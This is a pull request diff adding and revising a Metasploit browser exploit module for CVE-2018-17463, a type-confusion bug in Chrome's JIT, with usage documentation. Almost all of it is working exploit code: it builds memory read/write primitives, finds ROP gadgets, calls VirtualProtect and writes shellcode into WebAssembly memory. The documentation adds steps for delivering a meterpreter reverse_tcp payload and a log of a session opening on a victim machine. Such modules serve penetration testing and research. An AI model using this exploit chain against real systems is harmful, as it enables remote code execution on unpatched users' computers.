### PR TITLE
CVE-2018-17463, Google Chrome < 70 Object.create exploit

### DIFF
--- a/documentation/modules/exploit/multi/browser/chrome_object_create.md
+++ b/documentation/modules/exploit/multi/browser/chrome_object_create.md
@@ -1,0 +1,61 @@
+This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary.
+The type confusion can be used to construct a arbitrary read/write memory primitive, which is used to write shellcode into rwx region of a WebAssembly object.
+
+**This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (version 67, 68 or 69), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/](https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/)
+
+You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
+You may also need to disable Windows Defender.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/chrome_object_create```
+2. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Scenarios
+
+### Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox
+
+Start Google Chrome without a sandbox:
+```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_object_create
+msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_object_create) > set URIPATH /
+URIPATH => /
+msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_object_create) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/browser/chrome_object_create) >
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Using URL: http://192.168.56.1:8080/
+[*] Server started.
+[*] 192.168.56.3     chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+[*] Sending stage (206403 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49682) at 2020-02-29 14:29:06 +0800
+
+msf5 exploit(multi/browser/chrome_object_create) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100
+meterpreter >
+```

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -231,27 +231,19 @@ class MetasploitModule < Msf::Exploit::Remote
             };
 
             function get_wasm_instance() {
-              var wasmImports = {
-                env: {
-                  puts: function puts (index) {}
-                }
-              };
-              var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,137,128,128,128,0,2,
-                96,1,127,1,127,96,0,0,2,140,128,128,128,0,1,3,101,110,118,4,112,117,
-                116,115,0,0,3,130,128,128,128,0,1,1,4,132,128,128,128,0,1,112,0,0,5,
-                131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,
-                109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,1,10,141,128,128,
-                128,0,1,135,128,128,128,0,0,65,16,16,0,26,11,11,146,128,128,128,0,1,0,
-                65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
-              return new WebAssembly.Instance(new WebAssembly.Module(buffer),wasmImports);
+              var buffer = new Uint8Array([
+                0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,
+                1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,
+                128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,
+                101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11
+              ]);
+              return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});
             }
 
             let wasm_instance = get_wasm_instance();
-            let wasm_export = wasm_instance.exports.hello;
-
             let wasm_addr = memory.addrof(wasm_instance);
             print("wasm_addr @ " + hex(wasm_addr));
-            let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n) + 0x32n;
+            let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);
             print("wasm_rwx @ " + hex(wasm_rwx_addr));
 
             memory.write(wasm_rwx_addr, shellcode);

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -262,8 +262,8 @@ class MetasploitModule < Msf::Exploit::Remote
             print('chrome_child @ ' + hex(chrome_child));
 
             function strcmp(input_string, str_address) {
-                for (var str_index=0;;str_index++) {
-                    let string_data = memory.read(str_address + str_index.toBigInt(), 1);
+                for (var str_index=0;;str_index += 1) {
+                    let string_data = memory.read(str_address + BigInt(str_index), 8);
                     if (input_string.length == str_index) {
                         if (string_data[0] == 0) {
                             return 0;
@@ -276,44 +276,24 @@ class MetasploitModule < Msf::Exploit::Remote
                 }
             }
 
-            function get_proc_address(base_pe, module, procname) {
+            function get_proc_address(base_pe, dllname, procname) {
                 let base_pe_hdr = base_pe + (memory.readPtr(base_pe + 0x3cn) & 0xffffn);
-                print('base_pe_hdr @ ' + hex(base_pe_hdr));
                 let base_pe_optional_header = base_pe_hdr + 0x18n;
-                print('base_pe_optional_header @ ' + hex(base_pe_optional_header));
-                let export_table = memory.readPtr(base_pe_optional_header + 0x70n) & 0xffffffffn;
-                print('exports @ ' + hex(export_table));
-                print('exports @ ' + hex(base_pe + export_table));
                 let import_table = memory.readPtr(base_pe_optional_header + 0x78n) & 0xffffffffn;
                 let import_size = memory.readPtr(base_pe_optional_header + 0x80n) & 0xffffffffn;
-                print('imports @ ' + hex(import_table));
-                print('imports @ ' + hex(base_pe + import_table));
-                print('import count @ ' + hex(import_size));
-                let iat = memory.readPtr(base_pe_optional_header + 0xd0n) & 0xffffffffn;
-                print('iat @ ' + hex(iat));
-                print('iat @ ' + hex(base_pe + iat));
-                let iat_thunk = memory.readPtr(base_pe + iat);
-                print('iat thunk @ ' + hex(iat_thunk));
 
-                alert('go');
                 for (var i=0n;i<import_size;i++) {
                     let import_name = memory.readPtr(base_pe + import_table + 0xcn + (i * 0x14n)) & 0xffffffffn;
                     if (import_name == 0) break;
-                    alert('strcmp');
-                    if (strcmp(module, base_pe + import_name) == 0) {
-                        alert('found');
+                    if (strcmp(dllname, base_pe + import_name) == 0) {
                         let import_org_thunk = memory.readPtr(base_pe + import_table + (i * 0x14n)) & 0xffffffffn;
                         let import_thunk = memory.readPtr(base_pe + import_table + 0x10n + (i * 0x14n)) & 0xffffffffn;
-                        print("import org thunk " + hex(import_org_thunk));
-                        print("import thunk " + hex(import_thunk));
                         for (var j=0n;;j++) {
                             let thunk = memory.readPtr(base_pe + import_org_thunk + 0x8n * j);
                             if (thunk == 0) break;
-                            //print("func hex = " + hex(thunk));
-                            //print("import cruft = " + hex(memory.readPtr(base_pe + thunk + 0x2n)));
                             if (strcmp(procname, base_pe + thunk + 0x2n) == 0) {
-                                print("func addr " + hex(thunk_addr));
-                                return memory.readPtr(base_pe + import_thunk + 0x8n * j);
+                                let thunk_addr = memory.readPtr(base_pe + import_thunk + 0x8n * j);
+                                return thunk_addr;
                             }
                         }
                         break;
@@ -321,19 +301,13 @@ class MetasploitModule < Msf::Exploit::Remote
                 }
                 fail('get_proc_address could not find ' + module + ':' + procname + ' in ' + hex(base_pe));
             }
-            print("CreateEventW = " + hex(get_proc_address(chrome_child, "KERNEL32.DLL", "CreateEventW")));
 
-            //alert(hex(chrome_child + iat));
+            let virtualprotect = get_proc_address(chrome_child, "KERNEL32.dll", "VirtualProtect");
+            print("virtualprotect = " + hex(virtualprotect));
 
-            //print('createeventw @ ' + hex(chrome_child + 0x4770260n));
-            //print('createeventw @ ' + hex(memory.readPtr(chrome_child + 0x4770260n)));
-
-            // CreateEventW
-            //let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20750n;
-            let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20d10n;
-            //let kernel32 = memory.readPtr(chrome_child + 0x4770260n) - 0x15290n;
-
+            let kernel32 = find_pe(virtualprotect);
             print('kernel32 @ ' + hex(kernel32));
+
             //log('ntqueryevent import @ ' + hex(kernel32 + 0x78208n));
             //log('ntqueryevent export @ ' + hex(memory.readPtr(kernel32 + 0x78208n)));
             // kernel32 00007FFF5D9A0000 NtQueryEvent import 00007FFF5DA18208
@@ -349,11 +323,6 @@ class MetasploitModule < Msf::Exploit::Remote
             //let ntdll = memory.readPtr(kernel32 + 0x9c478n) - 0x51870n;
 
             print('ntdll @ ' + hex(ntdll));
-
-            //kernel32 + 0x193d0n, // VirtualProtect
-            let virtualprotect = kernel32 + 0x1ACB0n;
-            //let virtualprotect = kernel32 + 0x2ef0n;
-            print('virtualprotect @ ' + hex(virtualprotect));
 
             /*
             00007ff9`296f0705 488b5150        mov     rdx,qword ptr [rcx+50h]

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -257,7 +257,6 @@ class MetasploitModule < Msf::Exploit::Remote
                 }
             }
 
-            //let chrome_child = (leak - 0x40b4500n) & 0x7ffffff0000n;
             let chrome_child = find_pe(leak);
             print('chrome_child @ ' + hex(chrome_child));
 
@@ -272,25 +271,28 @@ class MetasploitModule < Msf::Exploit::Remote
                 }
             }
 
-            function find_gadget(base_pe, gadget) {
-                for (var i=0n;i<0x1000n;i++) {
+            function find_gadget(base_pe, gadget, backwards = true) {
+                for (var i=0n;i<0x100n;i++) {
                     let text_section = memory.readPtr(base_pe + i * 0x8n);
                     if (text_section != 0x747865742e) continue; // .text
                     //if (text_section != 0x747865742e && text_section != 0x5452) continue; // .text or RZ
                     let text_size = (memory.readPtr(base_pe + i * 0x8n + 0x8n) & 0xffffffffn);
                     let text_address = (memory.readPtr(base_pe + i * 0x8n + 0xcn) & 0xffffffffn);
                     let text_start = base_pe + text_address;
-                    let text_end = text_start + text_size;
-                    for (let search = text_end - 0x20n;search>text_start;search-=1n) {
-                        for (var j=0;j<gadget.length;j++) {
-                            let data = memory.read(search + BigInt(j), 1);
-                            if (data[0] != gadget[j]) break;
-                            if (j == gadget.length - 1) {
+                    let text_end = text_start + text_size - 0x20n;
+                    for (var j=0;j<text_size;j++) {
+                        let search = text_start + BigInt(j);
+                        if (backwards) search = text_end - BigInt(j);
+                        for (var k=0;k<gadget.length;k++) {
+                            let data = memory.read(search + BigInt(k), 1);
+                            if (data[0] != gadget[k]) break;
+                            if (k == gadget.length - 1) {
                                 return search;
                             }
                         }
                     }
                 }
+                fail('find_gadget could not find ' + gadget + ' in ' + hex(base_pe));
             }
 
             function get_proc_address(base_pe, dllname, procname) {
@@ -329,28 +331,8 @@ class MetasploitModule < Msf::Exploit::Remote
             let ntdll = find_pe(ntqueryevent);
             print('ntdll @ ' + hex(ntdll));
 
-            //00007ff9`296f0705 488b5150        mov     rdx,qword ptr [rcx+50h]
-            //00007ff9`296f0709 488b6918        mov     rbp,qword ptr [rcx+18h]
-            //00007ff9`296f070d 488b6110        mov     rsp,qword ptr [rcx+10h]
-            //00007ff9`296f0711 ffe2            jmp     rdx
-
-            //let gadget = 0x41414141n;
-            //let gadget = ntdll + 0xA0705n;
-            //let gadget = ntdll + 0xa11b5n;
-            //let gadget = ntdll + 0x51045n;
             let gadget = find_gadget(ntdll, [0x48, 0x8b, 0x51, 0x50, 0x48, 0x8b, 0x69, 0x18]); //0x1800a11b5      488b5150       mov rdx, qword [rcx + 0x50]
             print('gadget @ ' + hex(gadget));
-
-//    chrome_child + 0x36a657n, // pop rcx ; ret     59 c3
-//0x000000018007522f: pop rcx; ret;
-
-//            let pop_gadgets = [
-//                chrome_child + 0x7522fn,   // pop rcx ; ret     59 c3
-//                chrome_child + 0x36a657n,  // pop rcx ; ret     59 c3
-//                chrome_child + 0x9962n,    // pop rdx ; ret     5a c3
-//                chrome_child + 0xc72852n,  // pop r8 ; ret      41 58 c3
-//                chrome_child + 0xc51425n,  // pop r9 ; ret      41 59 c3
-//            ];
 
             let pop_rcx = find_gadget(chrome_child, [0x59, 0xc3]);
             print('pop_rcx @ ' + hex(pop_rcx));
@@ -358,18 +340,8 @@ class MetasploitModule < Msf::Exploit::Remote
             print('pop_rdx @ ' + hex(pop_rdx));
             let pop_r8 = find_gadget(chrome_child, [0x41, 0x58, 0xc3]);
             print('pop_r8 @ ' + hex(pop_r8));
-            let pop_r9 = find_gadget(chrome_child, [0x41, 0x59, 0xc3]);
+            let pop_r9 = find_gadget(chrome_child, [0x41, 0x59, 0xc3], false);
             print('pop_r9 @ ' + hex(pop_r9));
-
-            //print('gadget = ' + hex(memory.readPtr(gadget) & 0xffffffffn));
-            //print('pop_gadget @ ' + hex(pop_gadgets[0]));
-            //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[0]) & 0xffffn));
-            //print('pop_gadget @ ' + hex(pop_gadgets[1]));
-            //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[1]) & 0xffffn));
-            //print('pop_gadget @ ' + hex(pop_gadgets[2]));
-            //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[2]) & 0xffffffn));
-            //print('pop_gadget @ ' + hex(pop_gadgets[3]));
-            //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[3]) & 0xffffffn));
 
             let scratch_addr = memory.readPtr(memory.addrof(scratch) + 0x20n);
 

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -275,12 +275,13 @@ class MetasploitModule < Msf::Exploit::Remote
             function find_gadget(base_pe, gadget) {
                 for (var i=0n;i<0x1000n;i++) {
                     let text_section = memory.readPtr(base_pe + i * 0x8n);
-                    if (text_section != 0x747865742e && text_section != 0x5452) continue; // .text or RZ
+                    if (text_section != 0x747865742e) continue; // .text
+                    //if (text_section != 0x747865742e && text_section != 0x5452) continue; // .text or RZ
                     let text_size = (memory.readPtr(base_pe + i * 0x8n + 0x8n) & 0xffffffffn);
                     let text_address = (memory.readPtr(base_pe + i * 0x8n + 0xcn) & 0xffffffffn);
                     let text_start = base_pe + text_address;
                     let text_end = text_start + text_size;
-                    for (let search = text_start;search<text_end;search+=1n) {
+                    for (let search = text_end - 0x20n;search>text_start;search-=1n) {
                         for (var j=0;j<gadget.length;j++) {
                             let data = memory.read(search + BigInt(j), 1);
                             if (data[0] != gadget[j]) break;
@@ -333,36 +334,33 @@ class MetasploitModule < Msf::Exploit::Remote
             //00007ff9`296f070d 488b6110        mov     rsp,qword ptr [rcx+10h]
             //00007ff9`296f0711 ffe2            jmp     rdx
 
-            let gadget = find_gadget(ntdll, [0x48, 0x8b, 0x51, 0x50, 0x48, 0x8b, 0x69, 0x18]);
-
-            //0x1800a11b5      488b5150       mov rdx, qword [rcx + 0x50]
-            //00007FFF5FEE11B5 488B5150
-            //0x78ea1045      488b5150       mov rdx, qword [rcx + 0x50]
-
             //let gadget = 0x41414141n;
             //let gadget = ntdll + 0xA0705n;
             //let gadget = ntdll + 0xa11b5n;
             //let gadget = ntdll + 0x51045n;
+            let gadget = find_gadget(ntdll, [0x48, 0x8b, 0x51, 0x50, 0x48, 0x8b, 0x69, 0x18]); //0x1800a11b5      488b5150       mov rdx, qword [rcx + 0x50]
+            print('gadget @ ' + hex(gadget));
 
 //    chrome_child + 0x36a657n, // pop rcx ; ret     59 c3
 //0x000000018007522f: pop rcx; ret;
 
-            let pop_gadgets_old = [
+//            let pop_gadgets = [
 //                chrome_child + 0x7522fn,   // pop rcx ; ret     59 c3
-                chrome_child + 0x36a657n,  // pop rcx ; ret     59 c3
-                chrome_child + 0x9962n,    // pop rdx ; ret     5a c3
-                chrome_child + 0xc72852n,  // pop r8 ; ret      41 58 c3
-                chrome_child + 0xc51425n,  // pop r9 ; ret      41 59 c3
-            ];
+//                chrome_child + 0x36a657n,  // pop rcx ; ret     59 c3
+//                chrome_child + 0x9962n,    // pop rdx ; ret     5a c3
+//                chrome_child + 0xc72852n,  // pop r8 ; ret      41 58 c3
+//                chrome_child + 0xc51425n,  // pop r9 ; ret      41 59 c3
+//            ];
 
-            let pop_gadgets = [
-                find_gadget(chrome_child, [0x59, 0xc3]),
-                find_gadget(chrome_child, [0x5a, 0xc3]),
-                find_gadget(chrome_child, [0x41, 0x58, 0xc3]),
-                find_gadget(chrome_child, [0x41, 0x59, 0xc3]),
-            ];
+            let pop_rcx = find_gadget(chrome_child, [0x59, 0xc3]);
+            print('pop_rcx @ ' + hex(pop_rcx));
+            let pop_rdx = find_gadget(chrome_child, [0x5a, 0xc3]);
+            print('pop_rdx @ ' + hex(pop_rdx));
+            let pop_r8 = find_gadget(chrome_child, [0x41, 0x58, 0xc3]);
+            print('pop_r8 @ ' + hex(pop_r8));
+            let pop_r9 = find_gadget(chrome_child, [0x41, 0x59, 0xc3]);
+            print('pop_r9 @ ' + hex(pop_r9));
 
-            print('gadget @ ' + hex(gadget));
             //print('gadget = ' + hex(memory.readPtr(gadget) & 0xffffffffn));
             //print('pop_gadget @ ' + hex(pop_gadgets[0]));
             //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[0]) & 0xffffn));
@@ -386,13 +384,13 @@ class MetasploitModule < Msf::Exploit::Remote
             let fake_stack = scratch_addr + 0x10000n;
 
             let stack = [
-                pop_gadgets[0],
+                pop_rcx,
                 sc_addr,
-                pop_gadgets[1],
+                pop_rdx,
                 0x1000n,
-                pop_gadgets[2],
+                pop_r8,
                 0x40n,
-                pop_gadgets[3],
+                pop_r9,
                 scratch_addr,
                 virtualprotect,
                 sc_addr,
@@ -403,7 +401,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
 
             memory.writePtr(el_addr + 0x10n, fake_stack); // RSP
-            memory.writePtr(el_addr + 0x50n, pop_gadgets[0] + 1n); // RIP = ret
+            memory.writePtr(el_addr + 0x50n, pop_rcx + 1n); // RIP = ret
             memory.writePtr(el_addr + 0x58n, 0n);
             memory.writePtr(el_addr + 0x60n, 0n);
             memory.writePtr(el_addr + 0x68n, 0n);

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -29,9 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],
         ],
       'Arch'           => [ ARCH_X64 ],
-      'Platform'       => 'windows',
+      'Platform'       => ['windows', 'osx'],
       'DefaultTarget'  => 0,
-      'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' },
       'Targets'        => [ [ 'Automatic', { } ] ],
       'DisclosureDate' => 'Sep 25 2018'))
     register_advanced_options([
@@ -59,12 +58,6 @@ class MetasploitModule < Msf::Exploit::Remote
           request.send("" + arg);
         };
         ' : '' }
-
-        // We need some space later
-        let scratch = new ArrayBuffer(0x100000);
-        let scratch_u8 = new Uint8Array(scratch);
-        let scratch_u64 = new BigUint64Array(scratch);
-        scratch_u8.fill(0x41, 0, 10);
 
         let shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);
 
@@ -200,7 +193,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
             gc();
 
-
             let memview_buf_addr = addrof(memview_buf);
             memview_buf_addr--;
             print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);
@@ -238,146 +230,46 @@ class MetasploitModule < Msf::Exploit::Remote
                 },
             };
 
+            function get_wasm_instance() {
+              var wasmImports = {
+                env: {
+                  puts: function puts (index) {}
+                }
+              };
+              var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,137,128,128,128,0,2,
+                96,1,127,1,127,96,0,0,2,140,128,128,128,0,1,3,101,110,118,4,112,117,
+                116,115,0,0,3,130,128,128,128,0,1,1,4,132,128,128,128,0,1,112,0,0,5,
+                131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,
+                109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,1,10,141,128,128,
+                128,0,1,135,128,128,128,0,0,65,16,16,0,26,11,11,146,128,128,128,0,1,0,
+                65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
+              return new WebAssembly.Instance(new WebAssembly.Module(buffer),wasmImports);
+            }
+
+            let wasm_instance = get_wasm_instance();
+            let wasm_export = wasm_instance.exports.hello;
+
+            let wasm_addr = memory.addrof(wasm_instance);
+            print("wasm_addr @ " + hex(wasm_addr));
+            let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n) + 0x32n;
+            print("wasm_rwx @ " + hex(wasm_rwx_addr));
+
+            memory.write(wasm_rwx_addr, shellcode);
+
+            let fake_vtab = new ArrayBuffer(0x80);
+            let fake_vtab_u64 = new BigUint64Array(fake_vtab);
+            let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);
+
             let div = document.createElement('div');
             let div_addr = memory.addrof(div);
             print('div_addr @ ' + hex(div_addr));
             let el_addr = memory.readPtr(div_addr + 0x20n);
-            let leak = memory.readPtr(el_addr);
+            print('el_addr @ ' + hex(div_addr));
 
-            print('leak @ ' + hex(leak));
-            function find_pe(address) {
-                let search_pe = address & 0x7fffffff0000n;
-                while (1) {
-                    let read_val = memory.read(search_pe, 2);
-                    if (read_val[0] == 77
-                        && read_val[1] == 90) { //MZ
-                        return search_pe;
-                    }
-                    search_pe -= 0x10000n;
-                }
-            }
+            fake_vtab_u64[8] = wasm_rwx_addr;
+            memory.writePtr(el_addr, fake_vtab_addr);
 
-            let chrome_child = find_pe(leak);
-            print('chrome_child @ ' + hex(chrome_child));
-
-            function strcmp(input_string, str_address) {
-                for (var str_index=0;;str_index += 1) {
-                    let string_data = memory.read(str_address + BigInt(str_index), 8);
-                    if (input_string.length == str_index) {
-                        if (string_data[0] == 0) return 0;
-                        return -1;
-                    }
-                    if (string_data[0] != input_string.charCodeAt(str_index)) return -1;
-                }
-            }
-
-            function find_gadget(base_pe, gadget, backwards = true) {
-                for (var i=0n;i<0x100n;i++) {
-                    let text_section = memory.readPtr(base_pe + i * 0x8n);
-                    if (text_section != 0x747865742e) continue; // .text
-                    //if (text_section != 0x747865742e && text_section != 0x5452) continue; // .text or RZ
-                    let text_size = (memory.readPtr(base_pe + i * 0x8n + 0x8n) & 0xffffffffn);
-                    let text_address = (memory.readPtr(base_pe + i * 0x8n + 0xcn) & 0xffffffffn);
-                    let text_start = base_pe + text_address;
-                    let text_end = text_start + text_size - 0x20n;
-                    for (var j=0;j<text_size;j++) {
-                        let search = text_start + BigInt(j);
-                        if (backwards) search = text_end - BigInt(j);
-                        for (var k=0;k<gadget.length;k++) {
-                            let data = memory.read(search + BigInt(k), 1);
-                            if (data[0] != gadget[k]) break;
-                            if (k == gadget.length - 1) {
-                                return search;
-                            }
-                        }
-                    }
-                }
-                fail('find_gadget could not find ' + gadget + ' in ' + hex(base_pe));
-            }
-
-            function get_proc_address(base_pe, dllname, procname) {
-                let base_pe_optional_header = base_pe + (memory.readPtr(base_pe + 0x3cn) & 0xffffn) + 0x18n;
-                let import_table = memory.readPtr(base_pe_optional_header + 0x78n) & 0xffffffffn;
-                let import_size = memory.readPtr(base_pe_optional_header + 0x80n) & 0xffffffffn;
-                for (var i=0n;i<import_size;i++) {
-                    let import_name = memory.readPtr(base_pe + import_table + 0xcn + (i * 0x14n)) & 0xffffffffn;
-                    if (import_name == 0) break;
-                    if (strcmp(dllname, base_pe + import_name) == 0) {
-                        let import_org_thunk = memory.readPtr(base_pe + import_table + (i * 0x14n)) & 0xffffffffn;
-                        for (var j=0n;;j++) {
-                            let thunk = memory.readPtr(base_pe + import_org_thunk + 0x8n * j);
-                            if (thunk == 0) break;
-                            if (strcmp(procname, base_pe + thunk + 0x2n) == 0) {
-                                let import_thunk = memory.readPtr(base_pe + import_table + 0x10n + (i * 0x14n)) & 0xffffffffn;
-                                let thunk_addr = memory.readPtr(base_pe + import_thunk + 0x8n * j);
-                                return thunk_addr;
-                            }
-                        }
-                        break;
-                    }
-                }
-                fail('get_proc_address could not find ' + module + ':' + procname + ' in ' + hex(base_pe));
-            }
-
-            let virtualprotect = get_proc_address(chrome_child, "KERNEL32.dll", "VirtualProtect");
-            print("virtualprotect = " + hex(virtualprotect));
-
-            let kernel32 = find_pe(virtualprotect);
-            print('kernel32 @ ' + hex(kernel32));
-
-            let ntqueryevent = get_proc_address(kernel32, "ntdll.dll", "NtQueryEvent");
-            print("ntqueryevent = " + hex(ntqueryevent));
-
-            let ntdll = find_pe(ntqueryevent);
-            print('ntdll @ ' + hex(ntdll));
-
-            let gadget = find_gadget(ntdll, [0x48, 0x8b, 0x51, 0x50, 0x48, 0x8b, 0x69, 0x18]); //0x1800a11b5      488b5150       mov rdx, qword [rcx + 0x50]
-            print('gadget @ ' + hex(gadget));
-
-            let pop_rcx = find_gadget(chrome_child, [0x59, 0xc3]);
-            print('pop_rcx @ ' + hex(pop_rcx));
-            let pop_rdx = find_gadget(chrome_child, [0x5a, 0xc3]);
-            print('pop_rdx @ ' + hex(pop_rdx));
-            let pop_r8 = find_gadget(chrome_child, [0x41, 0x58, 0xc3]);
-            print('pop_r8 @ ' + hex(pop_r8));
-            let pop_r9 = find_gadget(chrome_child, [0x41, 0x59, 0xc3], false);
-            print('pop_r9 @ ' + hex(pop_r9));
-
-            let scratch_addr = memory.readPtr(memory.addrof(scratch) + 0x20n);
-
-            let sc_offset = 0x20000n - scratch_addr % 0x1000n;
-            let sc_addr = scratch_addr + sc_offset
-            scratch_u8.set(shellcode, Number(sc_offset));
-
-            scratch_u64.fill(gadget, 0, 100);
-            //scratch_u64.fill(0xdeadbeefn, 0, 100);
-
-            let fake_vtab = scratch_addr;
-            let fake_stack = scratch_addr + 0x10000n;
-
-            let stack = [
-                pop_rcx,
-                sc_addr,
-                pop_rdx,
-                0x1000n,
-                pop_r8,
-                0x40n,
-                pop_r9,
-                scratch_addr,
-                virtualprotect,
-                sc_addr,
-            ];
-
-            for (let i = 0; i < stack.length; ++i) {
-                scratch_u64[0x10000/8 + i] = stack[i];
-            }
-
-            memory.writePtr(el_addr + 0x10n, fake_stack); // RSP
-            memory.writePtr(el_addr + 0x50n, pop_rcx + 1n); // RIP = ret
-            memory.writePtr(el_addr + 0x58n, 0n);
-            memory.writePtr(el_addr + 0x60n, 0n);
-            memory.writePtr(el_addr + 0x68n, 0n);
-            memory.writePtr(el_addr, fake_vtab);
+            print('Triggering...');
 
             // Trigger virtual call
             div.dispatchEvent(new Event('click'));

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -15,6 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
         This modules exploits a type confusion in Google Chromes JIT compiler.
       The Object.create operation can be used to cause a type confusion between a
       PropertyArray and a NameDictionary.
+        The payload is executed within the rwx region of the sandboxed renderer
+      process, so the browser must be run with the --no-sandbox option for the
+      payload to work.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [
@@ -47,242 +50,251 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
+
+    jscript = %Q^
+let shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);
+
+let ab = new ArrayBuffer(8);
+let floatView = new Float64Array(ab);
+let uint64View = new BigUint64Array(ab);
+let uint8View = new Uint8Array(ab);
+
+Number.prototype.toBigInt = function toBigInt() {
+    floatView[0] = this;
+    return uint64View[0];
+};
+
+BigInt.prototype.toNumber = function toNumber() {
+    uint64View[0] = this;
+    return floatView[0];
+};
+
+function hex(n) {
+    return '0x' + n.toString(16);
+};
+
+function fail(s) {
+    print('FAIL ' + s);
+    throw null;
+}
+
+const NUM_PROPERTIES = 32;
+const MAX_ITERATIONS = 100000;
+
+function gc() {
+    for (let i = 0; i < 200; i++) {
+        new ArrayBuffer(0x100000);
+    }
+}
+
+function make(properties) {
+    let o = {inline: 42}      // TODO
+    for (let i = 0; i < NUM_PROPERTIES; i++) {
+        eval(`o.p${i} = properties[${i}];`);
+    }
+    return o;
+}
+
+function pwn() {
+    function find_overlapping_properties() {
+        let propertyNames = [];
+        for (let i = 0; i < NUM_PROPERTIES; i++) {
+            propertyNames[i] = `p${i}`;
+        }
+        eval(`
+            function vuln(o) {
+                let a = o.inline;
+                this.Object.create(o);
+                ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\n')}
+                return [${propertyNames.join(', ')}];
+            }
+        `);
+
+        let propertyValues = [];
+        for (let i = 1; i < NUM_PROPERTIES; i++) {
+            propertyValues[i] = -i;
+        }
+
+        for (let i = 0; i < MAX_ITERATIONS; i++) {
+            let r = vuln(make(propertyValues));
+            if (r[1] !== -1) {
+                for (let i = 1; i < r.length; i++) {
+                    if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
+                        return [i, -r[i]];
+                    }
+                }
+            }
+        }
+
+        fail("Failed to find overlapping properties");
+    }
+
+    function addrof(obj) {
+        eval(`
+            function vuln(o) {
+                let a = o.inline;
+                this.Object.create(o);
+                return o.p${p1}.x1;
+            }
